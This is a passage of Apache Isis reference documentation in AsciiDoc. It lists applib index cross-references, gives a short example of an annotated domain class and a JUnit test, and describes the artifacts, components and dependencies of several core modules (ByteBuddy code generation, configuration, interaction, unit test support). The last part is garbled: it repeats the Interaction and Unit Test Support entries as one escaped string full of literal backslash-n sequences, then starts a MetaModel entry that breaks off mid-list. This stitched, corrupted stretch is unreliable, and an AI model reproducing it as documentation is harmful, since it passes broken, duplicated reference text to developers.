xref:refguide:applib:index/jaxb/JodaTimeXMLGregorianCalendarMarshalling.adoc[JodaTimeXMLGregorianCalendarMarshalling], xref:refguide:applib:index/jaxb/PersistentEntitiesAdapter.adoc[PersistentEntitiesAdapter],
xref:refguide:applib:index/jaxb/PersistentEntityAdapter.adoc[PersistentEntityAdapter], xref:refguide:applib:index/jaxb/PrimitiveJaxbAdapters.adoc[PrimitiveJaxbAdapters],
xref:refguide:applib:index/layout/component/ActionLayoutData.adoc[ActionLayoutData], xref:refguide:applib:index/layout/component/ActionLayoutDataOwner.adoc[ActionLayoutDataOwner],
xref:refguide:applib:index/layout/component/CollectionLayoutData.adoc[CollectionLayoutData], xref:refguide:applib:index/layout/component/CollectionLayoutDataOwner.adoc[CollectionLayoutDataOwner],
xref:refguide:applib:index/layout/component/CssClassFaPosition.adoc[CssClassFaPosition], xref:refguide:applib:index/layout/component/DomainObjectLayoutData.adoc[DomainObjectLayoutData],
xref:refguide:applib:index/layout/component/DomainObjectLayoutDataOwner.adoc[DomainObjectLayoutDataOwner], xref:refguide:applib:index/layout/component/FieldSet.adoc[FieldSet],
xref:refguide:applib:index/layout/component/FieldSetOwner.adoc[FieldSetOwner], xref:refguide:applib:index/layout/component/HasBookmarking.adoc[HasBookmarking],
xref:refguide:applib:index/layout/component/HasCssClass.adoc[HasCssClass], xref:refguide:applib:index/layout/component/HasCssClassFa.adoc[HasCssClassFa],
xref:refguide:applib:index/layout/component/HasDescribedAs.adoc[HasDescribedAs], xref:refguide:applib:index/layout/component/HasHidden.adoc[HasHidden],
xref:refguide:applib:index/layout/component/HasNamed.adoc[HasNamed], xref:refguide:applib:index/layout/component/MemberRegion.adoc[MemberRegion],
xref:refguide:applib:index/layout/component/MemberRegionOwner.adoc[MemberRegionOwner], xref:refguide:applib:index/layout/component/Owned.adoc[Owned],
xref:refguide:applib:index/layout/component/Owner.adoc[Owner], xref:refguide:applib:index/layout/component/PropertyLayoutData.adoc[PropertyLayoutData],
xref:refguide:applib:index/layout/component/ServiceActionLayoutData.adoc[ServiceActionLayoutData], xref:refguide:applib:index/layout/component/ServiceActionLayoutDataOwner.adoc[ServiceActionLayoutDataOwner],
xref:refguide:applib:index/layout/grid/Grid.adoc[Grid], xref:refguide:applib:index/layout/grid/GridAbstract.adoc[GridAbstract],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3ClearFix.adoc[BS3ClearFix], xref:refguide:applib:index/layout/grid/bootstrap3/BS3ClearFixHidden.adoc[BS3ClearFixHidden],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3ClearFixVisible.adoc[BS3ClearFixVisible], xref:refguide:applib:index/layout/grid/bootstrap3/BS3Col.adoc[BS3Col],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3Element.adoc[BS3Element], xref:refguide:applib:index/layout/grid/bootstrap3/BS3ElementAbstract.adoc[BS3ElementAbstract],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3Grid.adoc[BS3Grid], xref:refguide:applib:index/layout/grid/bootstrap3/BS3Row.adoc[BS3Row],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3RowContent.adoc[BS3RowContent], xref:refguide:applib:index/layout/grid/bootstrap3/BS3RowContentOwner.adoc[BS3RowContentOwner],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3RowOwner.adoc[BS3RowOwner], xref:refguide:applib:index/layout/grid/bootstrap3/BS3Tab.adoc[BS3Tab],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3TabGroup.adoc[BS3TabGroup], xref:refguide:applib:index/layout/grid/bootstrap3/BS3TabGroupOwner.adoc[BS3TabGroupOwner],
xref:refguide:applib:index/layout/grid/bootstrap3/BS3TabOwner.adoc[BS3TabOwner], xref:refguide:applib:index/layout/grid/bootstrap3/HasCssId.adoc[HasCssId],
xref:refguide:applib:index/layout/grid/bootstrap3/Size.adoc[Size], xref:refguide:applib:index/layout/grid/bootstrap3/SizeSpan.adoc[SizeSpan],
xref:refguide:applib:index/layout/grid/bootstrap3/WithinGrid.adoc[WithinGrid], xref:refguide:applib:index/layout/links/Link.adoc[Link],
xref:refguide:applib:index/layout/menubars/HasNamed.adoc[HasNamed], xref:refguide:applib:index/layout/menubars/Menu.adoc[Menu],
xref:refguide:applib:index/layout/menubars/MenuBar.adoc[MenuBar], xref:refguide:applib:index/layout/menubars/MenuBars.adoc[MenuBars],
xref:refguide:applib:index/layout/menubars/MenuBarsAbstract.adoc[MenuBarsAbstract], xref:refguide:applib:index/layout/menubars/MenuSection.adoc[MenuSection],
xref:refguide:applib:index/layout/menubars/bootstrap3/BS3Menu.adoc[BS3Menu], xref:refguide:applib:index/layout/menubars/bootstrap3/BS3MenuBar.adoc[BS3MenuBar],
xref:refguide:applib:index/layout/menubars/bootstrap3/BS3MenuBars.adoc[BS3MenuBars], xref:refguide:applib:index/layout/menubars/bootstrap3/BS3MenuSection.adoc[BS3MenuSection],
xref:refguide:applib:index/mixins/dto/Dto.adoc[Dto], xref:refguide:applib:index/mixins/dto/DtoMixinConstants.adoc[DtoMixinConstants],
xref:refguide:applib:index/mixins/dto/Dto_downloadXml.adoc[Dto_downloadXml], xref:refguide:applib:index/mixins/dto/Dto_downloadXsd.adoc[Dto_downloadXsd],
xref:refguide:applib:index/mixins/layout/LayoutMixinConstants.adoc[LayoutMixinConstants], xref:refguide:applib:index/mixins/layout/Object_downloadLayoutXml.adoc[Object_downloadLayoutXml],
xref:refguide:applib:index/mixins/metamodel/Object_downloadMetamodelXml.adoc[Object_downloadMetamodelXml], xref:refguide:applib:index/mixins/metamodel/Object_objectIdentifier.adoc[Object_objectIdentifier],
xref:refguide:applib:index/mixins/metamodel/Object_objectType.adoc[Object_objectType], xref:refguide:applib:index/mixins/metamodel/Object_rebuildMetamodel.adoc[Object_rebuildMetamodel],
xref:refguide:applib:index/mixins/rest/Object_openRestApi.adoc[Object_openRestApi], xref:refguide:applib:index/mixins/security/HasUsername.adoc[HasUsername],
xref:refguide:applib:index/mixins/system/DomainChangeRecord.adoc[DomainChangeRecord], xref:refguide:applib:index/mixins/system/DomainChangeRecord_openTargetObject.adoc[DomainChangeRecord_openTargetObject],
xref:refguide:applib:index/mixins/system/DomainChangeRecord~ChangeType.adoc[DomainChangeRecord.ChangeType], xref:refguide:applib:index/mixins/system/HasInteractionId.adoc[HasInteractionId],
xref:refguide:applib:index/mixins/system/HasTransactionId.adoc[HasTransactionId], xref:refguide:applib:index/mixins/updates/OnUpdatedAt.adoc[OnUpdatedAt],
xref:refguide:applib:index/mixins/updates/OnUpdatedBy.adoc[OnUpdatedBy], xref:refguide:applib:index/mixins/updates/OnUpdatedByAndAt.adoc[OnUpdatedByAndAt],
xref:refguide:applib:index/query/AllInstancesQuery.adoc[AllInstancesQuery], xref:refguide:applib:index/query/NamedQuery.adoc[NamedQuery],
xref:refguide:applib:index/query/Query.adoc[Query], xref:refguide:applib:index/query/QueryRange.adoc[QueryRange],
xref:refguide:applib:index/services/acceptheader/AcceptHeaderService.adoc[AcceptHeaderService], xref:refguide:applib:index/services/appfeat/ApplicationFeature.adoc[ApplicationFeature],
xref:refguide:applib:index/services/appfeat/ApplicationFeatureId.adoc[ApplicationFeatureId], xref:refguide:applib:index/services/appfeat/ApplicationFeatureRepository.adoc[ApplicationFeatureRepository],
xref:refguide:applib:index/services/appfeat/ApplicationFeatureSort.adoc[ApplicationFeatureSort], xref:refguide:applib:index/services/appfeat/ApplicationMemberSort.adoc[ApplicationMemberSort],
xref:refguide:applib:index/services/bookmark/Bookmark.adoc[Bookmark], xref:refguide:applib:index/services/bookmark/BookmarkHolder.adoc[BookmarkHolder],
xref:refguide:applib:index/services/bookmark/BookmarkHolder_lookup.adoc[BookmarkHolder_lookup], xref:refguide:applib:index/services/bookmark/BookmarkHolder_object.adoc[BookmarkHolder_object],
xref:refguide:applib:index/services/bookmark/BookmarkService.adoc[BookmarkService], xref:refguide:applib:index/services/bookmarkui/BookmarkUiService.adoc[BookmarkUiService],
xref:refguide:applib:index/services/clock/ClockService.adoc[ClockService], xref:refguide:applib:index/services/command/Command.adoc[Command],
xref:refguide:applib:index/services/command/CommandExecutorService.adoc[CommandExecutorService], xref:refguide:applib:index/services/command/CommandOutcomeHandler.adoc[CommandOutcomeHandler],
xref:refguide:applib:index/services/commanddto/HasCommandDto.adoc[HasCommandDto], xref:refguide:applib:index/services/commanddto/conmap/ContentMappingServiceForCommandDto.adoc[ContentMappingServiceForCommandDto],
xref:refguide:applib:index/services/commanddto/conmap/ContentMappingServiceForCommandsDto.adoc[ContentMappingServiceForCommandsDto], xref:refguide:applib:index/services/commanddto/conmap/UserDataKeys.adoc[UserDataKeys],
xref:refguide:applib:index/services/commanddto/processor/CommandDtoProcessor.adoc[CommandDtoProcessor], xref:refguide:applib:index/services/commanddto/processor/CommandDtoProcessorForActionAbstract.adoc[CommandDtoProcessorForActionAbstract],
xref:refguide:applib:index/services/commanddto/processor/CommandDtoProcessorForPropertyAbstract.adoc[CommandDtoProcessorForPropertyAbstract], xref:refguide:applib:index/services/commanddto/processor/spi/CommandDtoProcessorService.adoc[CommandDtoProcessorService],
xref:refguide:applib:index/services/commanddto/processor/spi/CommandDtoProcessorServiceIdentity.adoc[CommandDtoProcessorServiceIdentity], xref:refguide:applib:index/services/confview/ConfigurationMenu.adoc[ConfigurationMenu],
xref:refguide:applib:index/services/confview/ConfigurationProperty.adoc[ConfigurationProperty], xref:refguide:applib:index/services/confview/ConfigurationViewService.adoc[ConfigurationViewService],
xref:refguide:applib:index/services/conmap/ContentMappingService.adoc[ContentMappingService], xref:refguide:applib:index/services/email/EmailService.adoc[EmailService],
xref:refguide:applib:index/services/error/ErrorDetails.adoc[ErrorDetails], xref:refguide:applib:index/services/error/ErrorReportingService.adoc[ErrorReportingService],
xref:refguide:applib:index/services/error/SimpleTicket.adoc[SimpleTicket], xref:refguide:applib:index/services/error/Ticket.adoc[Ticket],
xref:refguide:applib:index/services/eventbus/EventBusService.adoc[EventBusService], xref:refguide:applib:index/services/exceprecog/Category.adoc[Category],
xref:refguide:applib:index/services/exceprecog/ExceptionRecognizer.adoc[ExceptionRecognizer], xref:refguide:applib:index/services/exceprecog/ExceptionRecognizerAbstract.adoc[ExceptionRecognizerAbstract],
xref:refguide:applib:index/services/exceprecog/ExceptionRecognizerForType.adoc[ExceptionRecognizerForType], xref:refguide:applib:index/services/exceprecog/ExceptionRecognizerService.adoc[ExceptionRecognizerService],
xref:refguide:applib:index/services/exceprecog/Recognition.adoc[Recognition], xref:refguide:applib:index/services/factory/FactoryService.adoc[FactoryService],
xref:refguide:applib:index/services/grid/GridLoaderService.adoc[GridLoaderService], xref:refguide:applib:index/services/grid/GridService.adoc[GridService],
xref:refguide:applib:index/services/grid/GridSystemService.adoc[GridSystemService], xref:refguide:applib:index/services/health/Health.adoc[Health],
xref:refguide:applib:index/services/health/HealthCheckService.adoc[HealthCheckService], xref:refguide:applib:index/services/hint/HintIdProvider.adoc[HintIdProvider],
xref:refguide:applib:index/services/hint/HintStore.adoc[HintStore], xref:refguide:applib:index/services/homepage/HomePageResolverService.adoc[HomePageResolverService],
xref:refguide:applib:index/services/i18n/LocaleProvider.adoc[LocaleProvider], xref:refguide:applib:index/services/i18n/Mode.adoc[Mode],
xref:refguide:applib:index/services/i18n/TranslatableString.adoc[TranslatableString], xref:refguide:applib:index/services/i18n/TranslationService.adoc[TranslationService],
xref:refguide:applib:index/services/i18n/TranslationsResolver.adoc[TranslationsResolver], xref:refguide:applib:index/services/iactn/ActionInvocation.adoc[ActionInvocation],
xref:refguide:applib:index/services/iactn/Execution.adoc[Execution], xref:refguide:applib:index/services/iactn/ExecutionContext.adoc[ExecutionContext],
xref:refguide:applib:index/services/iactn/Interaction.adoc[Interaction], xref:refguide:applib:index/services/iactn/InteractionContext.adoc[InteractionContext],
xref:refguide:applib:index/services/iactn/PropertyEdit.adoc[PropertyEdit], xref:refguide:applib:index/services/iactn/SequenceType.adoc[SequenceType],
xref:refguide:applib:index/services/inject/ServiceInjector.adoc[ServiceInjector], xref:refguide:applib:index/services/jaxb/JaxbService.adoc[JaxbService],
xref:refguide:applib:index/services/layout/LayoutService.adoc[LayoutService], xref:refguide:applib:index/services/layout/LayoutServiceMenu.adoc[LayoutServiceMenu],
xref:refguide:applib:index/services/layout/Style.adoc[Style], xref:refguide:applib:index/services/linking/DeepLinkService.adoc[DeepLinkService],
xref:refguide:applib:index/services/menu/MenuBarsLoaderService.adoc[MenuBarsLoaderService], xref:refguide:applib:index/services/menu/MenuBarsService.adoc[MenuBarsService],
xref:refguide:applib:index/services/message/MessageService.adoc[MessageService], xref:refguide:applib:index/services/metamodel/BeanSort.adoc[BeanSort],
xref:refguide:applib:index/services/metamodel/Config.adoc[Config], xref:refguide:applib:index/services/metamodel/DomainMember.adoc[DomainMember],
xref:refguide:applib:index/services/metamodel/DomainModel.adoc[DomainModel], xref:refguide:applib:index/services/metamodel/MetaModelService.adoc[MetaModelService],
xref:refguide:applib:index/services/metamodel/MetaModelServiceMenu.adoc[MetaModelServiceMenu], xref:refguide:applib:index/services/metrics/MetricsService.adoc[MetricsService],
xref:refguide:applib:index/services/publishing/log/CommandLogger.adoc[CommandLogger], xref:refguide:applib:index/services/publishing/log/EntityChangesLogger.adoc[EntityChangesLogger],
xref:refguide:applib:index/services/publishing/log/EntityPropertyChangeLogger.adoc[EntityPropertyChangeLogger], xref:refguide:applib:index/services/publishing/log/ExecutionLogger.adoc[ExecutionLogger],
xref:refguide:applib:index/services/publishing/spi/CommandSubscriber.adoc[CommandSubscriber], xref:refguide:applib:index/services/publishing/spi/EntityChanges.adoc[EntityChanges],
xref:refguide:applib:index/services/publishing/spi/EntityChangesSubscriber.adoc[EntityChangesSubscriber], xref:refguide:applib:index/services/publishing/spi/EntityPropertyChange.adoc[EntityPropertyChange],
xref:refguide:applib:index/services/publishing/spi/EntityPropertyChangeSubscriber.adoc[EntityPropertyChangeSubscriber], xref:refguide:applib:index/services/publishing/spi/ExecutionSubscriber.adoc[ExecutionSubscriber],
xref:refguide:applib:index/services/queryresultscache/MethodReferences.adoc[MethodReferences], xref:refguide:applib:index/services/queryresultscache/QueryResultsCache.adoc[QueryResultsCache],
xref:refguide:applib:index/services/queryresultscache/QueryResultsCacheControl.adoc[QueryResultsCacheControl], xref:refguide:applib:index/services/registry/InstanceByPriorityComparator.adoc[InstanceByPriorityComparator],
xref:refguide:applib:index/services/registry/ServiceRegistry.adoc[ServiceRegistry], xref:refguide:applib:index/services/repository/EntityState.adoc[EntityState],
xref:refguide:applib:index/services/repository/RepositoryService.adoc[RepositoryService], xref:refguide:applib:index/services/routing/RoutingService.adoc[RoutingService],
xref:refguide:applib:index/services/scratchpad/Scratchpad.adoc[Scratchpad], xref:refguide:applib:index/services/session/SessionLoggingService.adoc[SessionLoggingService],
xref:refguide:applib:index/services/session/SessionLoggingServiceLogging.adoc[SessionLoggingServiceLogging], xref:refguide:applib:index/services/sudo/SudoService.adoc[SudoService],
xref:refguide:applib:index/services/swagger/Format.adoc[Format], xref:refguide:applib:index/services/swagger/SwaggerService.adoc[SwaggerService],
xref:refguide:applib:index/services/swagger/Visibility.adoc[Visibility], xref:refguide:applib:index/services/tablecol/TableColumnOrderForCollectionTypeAbstract.adoc[TableColumnOrderForCollectionTypeAbstract],
xref:refguide:applib:index/services/tablecol/TableColumnOrderService.adoc[TableColumnOrderService], xref:refguide:applib:index/services/title/TitleService.adoc[TitleService],
xref:refguide:applib:index/services/urlencoding/UrlEncodingService.adoc[UrlEncodingService], xref:refguide:applib:index/services/urlencoding/UrlEncodingServiceUsingBaseEncodingAbstract.adoc[UrlEncodingServiceUsingBaseEncodingAbstract],
xref:refguide:applib:index/services/user/RoleMemento.adoc[RoleMemento], xref:refguide:applib:index/services/user/UserMemento.adoc[UserMemento],
xref:refguide:applib:index/services/user/UserService.adoc[UserService], xref:refguide:applib:index/services/userprof/UserProfileService.adoc[UserProfileService],
xref:refguide:applib:index/services/userreg/EmailNotificationService.adoc[EmailNotificationService], xref:refguide:applib:index/services/userreg/UserDetails.adoc[UserDetails],
xref:refguide:applib:index/services/userreg/UserRegistrationService.adoc[UserRegistrationService], xref:refguide:applib:index/services/userreg/events/EmailEventAbstract.adoc[EmailEventAbstract],
xref:refguide:applib:index/services/userreg/events/EmailRegistrationEvent.adoc[EmailRegistrationEvent], xref:refguide:applib:index/services/userreg/events/PasswordResetEvent.adoc[PasswordResetEvent],
xref:refguide:applib:index/services/wrapper/DisabledException.adoc[DisabledException], xref:refguide:applib:index/services/wrapper/HiddenException.adoc[HiddenException],
xref:refguide:applib:index/services/wrapper/InvalidException.adoc[InvalidException], xref:refguide:applib:index/services/wrapper/WrapperFactory.adoc[WrapperFactory],
xref:refguide:applib:index/services/wrapper/WrappingObject.adoc[WrappingObject], xref:refguide:applib:index/services/wrapper/control/AsyncControl.adoc[AsyncControl],
xref:refguide:applib:index/services/wrapper/control/ControlAbstract.adoc[ControlAbstract], xref:refguide:applib:index/services/wrapper/control/ExceptionHandler.adoc[ExceptionHandler],
xref:refguide:applib:index/services/wrapper/control/ExceptionHandlerAbstract.adoc[ExceptionHandlerAbstract], xref:refguide:applib:index/services/wrapper/control/ExecutionMode.adoc[ExecutionMode],
xref:refguide:applib:index/services/wrapper/control/SyncControl.adoc[SyncControl], xref:refguide:applib:index/services/wrapper/events/AccessEvent.adoc[AccessEvent],
xref:refguide:applib:index/services/wrapper/events/ActionArgumentEvent.adoc[ActionArgumentEvent], xref:refguide:applib:index/services/wrapper/events/ActionInvocationEvent.adoc[ActionInvocationEvent],
xref:refguide:applib:index/services/wrapper/events/ActionUsabilityEvent.adoc[ActionUsabilityEvent], xref:refguide:applib:index/services/wrapper/events/ActionVisibilityEvent.adoc[ActionVisibilityEvent],
xref:refguide:applib:index/services/wrapper/events/CollectionAccessEvent.adoc[CollectionAccessEvent], xref:refguide:applib:index/services/wrapper/events/CollectionAddToEvent.adoc[CollectionAddToEvent],
xref:refguide:applib:index/services/wrapper/events/CollectionMethodEvent.adoc[CollectionMethodEvent], xref:refguide:applib:index/services/wrapper/events/CollectionRemoveFromEvent.adoc[CollectionRemoveFromEvent],
xref:refguide:applib:index/services/wrapper/events/CollectionUsabilityEvent.adoc[CollectionUsabilityEvent], xref:refguide:applib:index/services/wrapper/events/InteractionEvent.adoc[InteractionEvent],
xref:refguide:applib:index/services/wrapper/events/ObjectTitleEvent.adoc[ObjectTitleEvent], xref:refguide:applib:index/services/wrapper/events/ObjectValidityEvent.adoc[ObjectValidityEvent],
xref:refguide:applib:index/services/wrapper/events/ObjectVisibilityEvent.adoc[ObjectVisibilityEvent], xref:refguide:applib:index/services/wrapper/events/ParseValueEvent.adoc[ParseValueEvent],
xref:refguide:applib:index/services/wrapper/events/PropertyAccessEvent.adoc[PropertyAccessEvent], xref:refguide:applib:index/services/wrapper/events/PropertyModifyEvent.adoc[PropertyModifyEvent],
xref:refguide:applib:index/services/wrapper/events/PropertyUsabilityEvent.adoc[PropertyUsabilityEvent], xref:refguide:applib:index/services/wrapper/events/PropertyVisibilityEvent.adoc[PropertyVisibilityEvent],
xref:refguide:applib:index/services/wrapper/events/ProposedHolderEvent.adoc[ProposedHolderEvent], xref:refguide:applib:index/services/wrapper/events/UsabilityEvent.adoc[UsabilityEvent],
xref:refguide:applib:index/services/wrapper/events/ValidityEvent.adoc[ValidityEvent], xref:refguide:applib:index/services/wrapper/events/VisibilityEvent.adoc[VisibilityEvent],
xref:refguide:applib:index/services/wrapper/listeners/InteractionAdapter.adoc[InteractionAdapter], xref:refguide:applib:index/services/wrapper/listeners/InteractionListener.adoc[InteractionListener],
xref:refguide:applib:index/services/xactn/TransactionId.adoc[TransactionId], xref:refguide:applib:index/services/xactn/TransactionService.adoc[TransactionService],
xref:refguide:applib:index/services/xactn/TransactionState.adoc[TransactionState], xref:refguide:applib:index/services/xactn/TransactionalProcessor.adoc[TransactionalProcessor],
xref:refguide:applib:index/services/xml/XmlService.adoc[XmlService], xref:refguide:applib:index/services/xmlsnapshot/XmlSnapshotService.adoc[XmlSnapshotService],
xref:refguide:applib:index/services/xmlsnapshot/XmlSnapshotService~Snapshot.adoc[XmlSnapshotService.Snapshot], xref:refguide:applib:index/services/xmlsnapshot/XmlSnapshotService~Snapshot~Builder.adoc[XmlSnapshotService.Snapshot.Builder],
xref:refguide:applib:index/snapshot/SnapshottableWithInclusions.adoc[SnapshottableWithInclusions], xref:refguide:applib:index/spec/AbstractSpecification.adoc[AbstractSpecification],
xref:refguide:applib:index/spec/AbstractSpecification2.adoc[AbstractSpecification2], xref:refguide:applib:index/spec/Specification.adoc[Specification],
xref:refguide:applib:index/spec/Specification2.adoc[Specification2], xref:refguide:applib:index/spec/SpecificationAnd.adoc[SpecificationAnd],
xref:refguide:applib:index/spec/SpecificationNot.adoc[SpecificationNot], xref:refguide:applib:index/spec/SpecificationOr.adoc[SpecificationOr],
xref:refguide:applib:index/types/DescriptionType.adoc[DescriptionType], xref:refguide:applib:index/types/MemberIdentifierType.adoc[MemberIdentifierType],
xref:refguide:applib:index/types/TargetActionType.adoc[TargetActionType], xref:refguide:applib:index/types/TargetClassType.adoc[TargetClassType],
xref:refguide:applib:index/util/Enums.adoc[Enums], xref:refguide:applib:index/util/Equality.adoc[Equality],
xref:refguide:applib:index/util/Hashing.adoc[Hashing], xref:refguide:applib:index/util/JaxbUtil.adoc[JaxbUtil],
xref:refguide:applib:index/util/ObjectContracts.adoc[ObjectContracts], xref:refguide:applib:index/util/ReasonBuffer.adoc[ReasonBuffer],
xref:refguide:applib:index/util/ReasonBuffer2.adoc[ReasonBuffer2], xref:refguide:applib:index/util/Reasons.adoc[Reasons],
xref:refguide:applib:index/util/TitleBuffer.adoc[TitleBuffer], xref:refguide:applib:index/util/TitleBufferException.adoc[TitleBufferException],
xref:refguide:applib:index/util/ToString.adoc[ToString], xref:refguide:applib:index/util/schema/ChangesDtoUtils.adoc[ChangesDtoUtils],
xref:refguide:applib:index/util/schema/CommandDtoUtils.adoc[CommandDtoUtils], xref:refguide:applib:index/util/schema/CommonDtoUtils.adoc[CommonDtoUtils],
xref:refguide:applib:index/util/schema/InteractionDtoUtils.adoc[InteractionDtoUtils], xref:refguide:applib:index/util/schema/MemberExecutionDtoUtils.adoc[MemberExecutionDtoUtils],
xref:refguide:applib:index/value/Blob.adoc[Blob], xref:refguide:applib:index/value/Clob.adoc[Clob],
xref:refguide:applib:index/value/HasHtml.adoc[HasHtml], xref:refguide:applib:index/value/LocalResourcePath.adoc[LocalResourcePath],
xref:refguide:applib:index/value/Markup.adoc[Markup], xref:refguide:applib:index/value/NamedWithMimeType.adoc[NamedWithMimeType],
xref:refguide:applib:index/value/OpenUrlStrategy.adoc[OpenUrlStrategy], xref:refguide:applib:index/value/Password.adoc[Password]
****
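
For orientation, here is a one-class sketch of the programming model that these annotations define. It uses only applib annotations listed above; the class itself (`Counter`) is a hypothetical example, and persistence mapping is deliberately elided.

[source,java]
----
import org.apache.isis.applib.annotation.Action;
import org.apache.isis.applib.annotation.DomainObject;
import org.apache.isis.applib.annotation.Property;
import org.apache.isis.applib.annotation.SemanticsOf;
import org.apache.isis.applib.annotation.Title;

// The framework derives its metamodel from these annotations,
// so no UI code is required on the class.
@DomainObject
public class Counter {

    private String name;
    private int count;

    @Title                 // used as the object's title in the generated UI
    public String getName() { return name; }
    public void setName(final String name) { this.name = name; }

    @Property              // exposed as a (read-only, no setter) property
    public int getCount() { return count; }

    @Action(semantics = SemanticsOf.NON_IDEMPOTENT)  // exposed as an invokable action
    public Counter increment() {
        count++;
        return this;
    }
}
----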

|Apache Isis Core - Code Gen (ByteBuddy)
[source,yaml]
----
Group: org.apache.isis.core
Artifact: isis-core-codegen-bytebuddy
Type: jar
Directory: /core/codegen-bytebuddy
----
|Code generation using ByteBuddy.

.Components
****
o.a.i.core.codegen.bytebuddy.services.ProxyFactoryServiceByteBuddy +
****

.Dependencies
****
net.bytebuddy:byte-buddy:jar:<managed> +
org.apache.isis.commons:isis-commons:jar:<managed> +
org.objenesis:objenesis:jar:<managed> +
****

|Apache Isis Core - Configuration
[source,yaml]
----
Group: org.apache.isis.core
Artifact: isis-core-config
Type: jar
Directory: /core/config
----
|Isis configuration library for framework internal use.

.Components
****
o.a.i.core.config.RestEasyConfiguration$RestfulPathProviderImpl +
o.a.i.core.config.beans.IsisBeanFactoryPostProcessorForSpring +
o.a.i.core.config.beans.IsisBeanTypeRegistryDefault +
o.a.i.core.config.converters.PatternsConverter +
o.a.i.core.config.datasources.DataSourceIntrospectionService +
o.a.i.core.config.environment.IsisLocaleInitializer +
o.a.i.core.config.environment.IsisSystemEnvironment +
o.a.i.core.config.environment.IsisTimeZoneInitializer +
o.a.i.core.config.validators.PatternOptionalStringConstraintValidator +
o.a.i.core.config.viewer.wicket.WebAppContextPath +
****

.Dependencies
****
org.apache.isis.commons:isis-commons:jar:<managed> +
org.apache.isis.core:isis-applib:jar:<managed> +
org.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +
org.hibernate.validator:hibernate-validator:jar:<managed> +
org.springframework.boot:spring-boot-configuration-processor:jar:<managed> +
****

.Document Index Entries
****
xref:refguide:core:index/config/datasources/DataSourceIntrospectionService.adoc[DataSourceIntrospectionService]
****

|Apache Isis Core - Interaction
[source,yaml]
----
Group: org.apache.isis.core
Artifact: isis-core-interaction
Type: jar
Directory: /core/interaction
----
|Provides _Interaction Scope_.
Top-level action executions or property changes are wrapped in an _Interaction_,
which typically corresponds to an HTTP request/response cycle or a JUnit test method execution.

.Components
****
o.a.i.core.interaction.integration.InteractionAwareTransactionalBoundaryHandler +
o.a.i.core.interaction.scope.InteractionScopeBeanFactoryPostProcessor +
****

.Dependencies
****
org.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +
org.apache.isis.core:isis-core-metamodel:jar:<managed> +
****

.Document Index Entries
****
xref:refguide:core:index/interaction/session/InteractionFactory.adoc[InteractionFactory]
****

|Apache Isis Core - Unit Test Support
[source,yaml]
----
Group: org.apache.isis.core
Artifact: isis-core-internaltestsupport
Type: jar
Directory: /core/internaltestsupport
----
|Support for writing unit tests in either JUnit 4 or JUnit 5; should be added as a dependency with `scope=test` only.

.Dependencies
****
net.bytebuddy:byte-buddy:jar:<managed> +
org.apache.isis.commons:isis-commons:jar:<managed> +
org.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +
org.assertj:assertj-core:jar:<managed> +
org.datanucleus:javax.jdo:jar:<managed> +
org.hamcrest:hamcrest-library:jar:<managed> +
org.jmock:jmock:jar:<managed> +
org.jmock:jmock-junit4:jar:<managed> +
org.junit.jupiter:junit-jupiter-api:jar:<managed> +
org.junit.jupiter:junit-jupiter-engine:jar:<managed> +
org.junit.vintage:junit-vintage-engine:jar:<managed> +
org.mockito:mockito-core:jar:<managed> +
org.picocontainer:picocontainer:jar:<managed> +
org.slf4j:slf4j-api:jar:${slf4j-api.version} +
org.springframework:spring-test:jar:<managed> +
org.springframework.boot:spring-boot-starter-test:jar:<managed> +
****
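
A minimal sketch of the kind of test this module supports: plain JUnit 5 plus AssertJ, both pulled in via the artifacts listed above. The class under test, `Counter`, is the hypothetical example from the AppLib entry.

[source,java]
----
import org.junit.jupiter.api.Test;
import static org.assertj.core.api.Assertions.assertThat;

// Ordinary JUnit 5 + AssertJ, available (scope=test) through this module.
class CounterTest {

    @Test
    void increment_bumps_the_count() {
        Counter counter = new Counter();
        counter.increment();
        assertThat(counter.getCount()).isEqualTo(1);
    }
}
----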
\n\n.Components\n****\no.a.i.core.interaction.integration.InteractionAwareTransactionalBoundaryHandler +\no.a.i.core.interaction.scope.InteractionScopeBeanFactoryPostProcessor +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:core:index\/interaction\/session\/InteractionFactory.adoc[InteractionFactory]\n****\n\n|Apache Isis Core - Unit Test Support\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-internaltestsupport\nType: jar\nDirectory: \/core\/internaltestsupport\n----\n|Support for writing unit tests in either JUnit 4 or JUnit 5; should be added as a dependency with scope=test only.\n\n.Dependencies\n****\nnet.bytebuddy:byte-buddy:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-codegen-bytebuddy:jar:<managed> +\norg.assertj:assertj-core:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.hamcrest:hamcrest-library:jar:<managed> +\norg.jmock:jmock:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.junit.jupiter:junit-jupiter-api:jar:<managed> +\norg.junit.jupiter:junit-jupiter-engine:jar:<managed> +\norg.junit.vintage:junit-vintage-engine:jar:<managed> +\norg.mockito:mockito-core:jar:<managed> +\norg.picocontainer:picocontainer:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.springframework:spring-test:jar:<managed> +\norg.springframework.boot:spring-boot-starter-test:jar:<managed> +\n****\n\n|Apache Isis Core - MetaModel\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-core-metamodel\nType: jar\nDirectory: \/core\/metamodel\n----\n|.Components\n****\no.a.i.core.metamodel.facets.schema.IsisSchemaMetaModelRefiner +\no.a.i.core.metamodel.facets.schema.IsisSchemaValueTypeProvider +\no.a.i.core.metamodel.objectmanager.ObjectManagerDefault +\no.a.i.core.metamodel.progmodel.ProgrammingModelInitFilterDefault +\no.a.i.core.metamodel.services.ServiceInjectorDefault +\no.a.i.core.metamodel.services.appfeat.ApplicationFeatureRepositoryDefault 